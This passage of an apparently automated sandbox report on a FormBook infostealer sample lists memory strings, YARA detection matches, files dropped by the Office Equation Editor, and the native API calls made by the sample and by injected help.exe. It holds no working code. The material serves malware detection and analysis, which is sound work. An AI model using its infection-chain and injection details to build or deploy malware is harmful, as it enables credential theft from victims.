Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2113776918.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 00000006.00000000.2122869349.000000000842E000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.2115552459.0000000004263000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.2115416675.00000000041AD000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000006.00000000.2122869349.000000000842E000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2363397604.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2136966268.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2137046396.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2104089442.0000000000280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2363479849.0000000000250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.mpomboby8423.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mpomboby8423.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpomboby8423.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpomboby8423.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000007.00000002.2363397604.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2363397604.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2137078949.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2136966268.0000000000170000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2136966268.0000000000170000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2137046396.00000000002B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2137046396.00000000002B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2104089442.0000000000280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2104089442.0000000000280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2363479849.0000000000250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2363479849.0000000000250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.mpomboby8423.exe.280000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.mpomboby8423.exe.280000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.mpomboby8423.exe.280000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.mpomboby8423.exe.280000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.mpomboby8423.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.mpomboby8423.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.mpomboby8423.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.mpomboby8423.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mpomabiva[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\mpomboby8423.exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0041A060 NtClose,	5_2_0041A060
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0041A110 NtAllocateVirtualMemory,	5_2_0041A110
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00419F30 NtCreateFile,	5_2_00419F30
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00419FE0 NtReadFile,	5_2_00419FE0
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0041A05D NtClose,	5_2_0041A05D
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0041A08A NtClose,	5_2_0041A08A
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0041A10B NtAllocateVirtualMemory,	5_2_0041A10B
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00419F2A NtCreateFile,NtReadFile,	5_2_00419F2A
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009100C4 NtCreateFile,LdrInitializeThunk,	5_2_009100C4
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00910048 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_00910048
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00910078 NtResumeThread,LdrInitializeThunk,	5_2_00910078
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090F9F0 NtClose,LdrInitializeThunk,	5_2_0090F9F0
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090F900 NtReadFile,LdrInitializeThunk,	5_2_0090F900
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_0090FAD0
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FAE8 NtQueryInformationProcess,LdrInitializeThunk,	5_2_0090FAE8
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FBB8 NtQueryInformationToken,LdrInitializeThunk,	5_2_0090FBB8
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FB68 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_0090FB68
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FC90 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_0090FC90
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FC60 NtMapViewOfSection,LdrInitializeThunk,	5_2_0090FC60
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FD8C NtDelayExecution,LdrInitializeThunk,	5_2_0090FD8C
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FDC0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_0090FDC0
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FEA0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_0090FEA0
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_0090FED0
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FFB4 NtCreateSection,LdrInitializeThunk,	5_2_0090FFB4
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009110D0 NtOpenProcessToken,	5_2_009110D0
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00910060 NtQuerySection,	5_2_00910060
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009101D4 NtSetValueKey,	5_2_009101D4
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0091010C NtOpenDirectoryObject,	5_2_0091010C
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00911148 NtOpenThread,	5_2_00911148
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009107AC NtCreateMutant,	5_2_009107AC
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090F8CC NtWaitForSingleObject,	5_2_0090F8CC
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00911930 NtSetContextThread,	5_2_00911930
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090F938 NtWriteFile,	5_2_0090F938
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FAB8 NtQueryValueKey,	5_2_0090FAB8
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FA20 NtQueryInformationFile,	5_2_0090FA20
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FA50 NtEnumerateValueKey,	5_2_0090FA50
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FBE8 NtQueryVirtualMemory,	5_2_0090FBE8
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FB50 NtCreateKey,	5_2_0090FB50
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FC30 NtOpenProcess,	5_2_0090FC30
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00910C40 NtGetContextThread,	5_2_00910C40
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FC48 NtSetInformationFile,	5_2_0090FC48
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00911D80 NtSuspendThread,	5_2_00911D80
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FD5C NtEnumerateKey,	5_2_0090FD5C
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FE24 NtWriteVirtualMemory,	5_2_0090FE24
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FFFC NtCreateProcessEx,	5_2_0090FFFC
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0090FF34 NtQueueApcThread,	5_2_0090FF34
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00289882 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,	5_2_00289882
Source: C:\Windows\explorer.exe	Code function: 6_2_02975A52 NtCreateFile,	6_2_02975A52
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A000C4 NtCreateFile,LdrInitializeThunk,	7_2_00A000C4
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A007AC NtCreateMutant,LdrInitializeThunk,	7_2_00A007AC
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FF9F0 NtClose,LdrInitializeThunk,	7_2_009FF9F0
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FF900 NtReadFile,LdrInitializeThunk,	7_2_009FF900
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFAB8 NtQueryValueKey,LdrInitializeThunk,	7_2_009FFAB8
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_009FFAD0
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFAE8 NtQueryInformationProcess,LdrInitializeThunk,	7_2_009FFAE8
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFBB8 NtQueryInformationToken,LdrInitializeThunk,	7_2_009FFBB8
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFB50 NtCreateKey,LdrInitializeThunk,	7_2_009FFB50
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFB68 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_009FFB68
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFC60 NtMapViewOfSection,LdrInitializeThunk,	7_2_009FFC60
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFD8C NtDelayExecution,LdrInitializeThunk,	7_2_009FFD8C
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFDC0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_009FFDC0
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_009FFED0
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFFB4 NtCreateSection,LdrInitializeThunk,	7_2_009FFFB4
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A010D0 NtOpenProcessToken,	7_2_00A010D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A00060 NtQuerySection,	7_2_00A00060
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A00078 NtResumeThread,	7_2_00A00078
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A00048 NtProtectVirtualMemory,	7_2_00A00048
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A001D4 NtSetValueKey,	7_2_00A001D4
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A0010C NtOpenDirectoryObject,	7_2_00A0010C
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A01148 NtOpenThread,	7_2_00A01148
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FF8CC NtWaitForSingleObject,	7_2_009FF8CC
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A01930 NtSetContextThread,	7_2_00A01930
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FF938 NtWriteFile,	7_2_009FF938
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFA20 NtQueryInformationFile,	7_2_009FFA20
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFA50 NtEnumerateValueKey,	7_2_009FFA50
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFBE8 NtQueryVirtualMemory,	7_2_009FFBE8
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFC90 NtUnmapViewOfSection,	7_2_009FFC90
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFC30 NtOpenProcess,	7_2_009FFC30
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFC48 NtSetInformationFile,	7_2_009FFC48
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A00C40 NtGetContextThread,	7_2_00A00C40
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00A01D80 NtSuspendThread,	7_2_00A01D80
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFD5C NtEnumerateKey,	7_2_009FFD5C
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFEA0 NtReadVirtualMemory,	7_2_009FFEA0
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFE24 NtWriteVirtualMemory,	7_2_009FFE24
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFFFC NtCreateProcessEx,	7_2_009FFFFC
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_009FFF34 NtQueueApcThread,	7_2_009FFF34
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_0009A060 NtClose,	7_2_0009A060
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_0009A110 NtAllocateVirtualMemory,	7_2_0009A110
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00099F30 NtCreateFile,	7_2_00099F30
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00099FE0 NtReadFile,	7_2_00099FE0
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_0009A05D NtClose,	7_2_0009A05D
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_0009A08A NtClose,	7_2_0009A08A
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_0009A10B NtAllocateVirtualMemory,	7_2_0009A10B
Source: C:\Windows\SysWOW64\help.exe	Code function: 7_2_00099F2A NtCreateFile,NtReadFile,	7_2_00099F2A

Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_012BD929	4_2_012BD929
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_012BA951	4_2_012BA951
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_012C51BC	4_2_012C51BC
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_012C7991	4_2_012C7991
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_012C55E0	4_2_012C55E0
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_012C683C	4_2_012C683C
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_012C0432	4_2_012C0432
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_012C60C0	4_2_012C60C0
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 4_2_012C5B50	4_2_012C5B50
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0041E195	5_2_0041E195
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0041DA0A	5_2_0041DA0A
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00409E40	5_2_00409E40
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0041D643	5_2_0041D643
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00409E3B	5_2_00409E3B
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_012BD929	5_2_012BD929
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_012BA951	5_2_012BA951
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_012C51BC	5_2_012C51BC
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_012C7991	5_2_012C7991
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_012C683C	5_2_012C683C
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_012C60C0	5_2_012C60C0
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_012C5B50	5_2_012C5B50
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_012C55E0	5_2_012C55E0
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_012C0432	5_2_012C0432
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0091E0C6	5_2_0091E0C6
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0094D005	5_2_0094D005
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0093905A	5_2_0093905A
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00923040	5_2_00923040
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0099D06D	5_2_0099D06D
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0091E2E9	5_2_0091E2E9
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009C1238	5_2_009C1238
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009C63BF	5_2_009C63BF
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009463DB	5_2_009463DB
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0091F3CF	5_2_0091F3CF
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00922305	5_2_00922305
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00927353	5_2_00927353
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0096A37B	5_2_0096A37B
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00955485	5_2_00955485
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00931489	5_2_00931489
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009A443E	5_2_009A443E
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0095D47D	5_2_0095D47D
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0093C5F0	5_2_0093C5F0
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009A05E3	5_2_009A05E3
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0092351F	5_2_0092351F
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00966540	5_2_00966540
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_00924680	5_2_00924680
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0092E6C1	5_2_0092E6C1
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0096A634	5_2_0096A634
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009C2622	5_2_009C2622
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009A579A	5_2_009A579A
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0092C7BC	5_2_0092C7BC
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009557C3	5_2_009557C3
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0099F8C4	5_2_0099F8C4
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009BF8EE	5_2_009BF8EE
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0092C85C	5_2_0092C85C
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_0094286D	5_2_0094286D
Source: C:\Users\user\AppData\Roaming\mpomboby8423.exe	Code function: 5_2_009C098E	5_2_009C098E
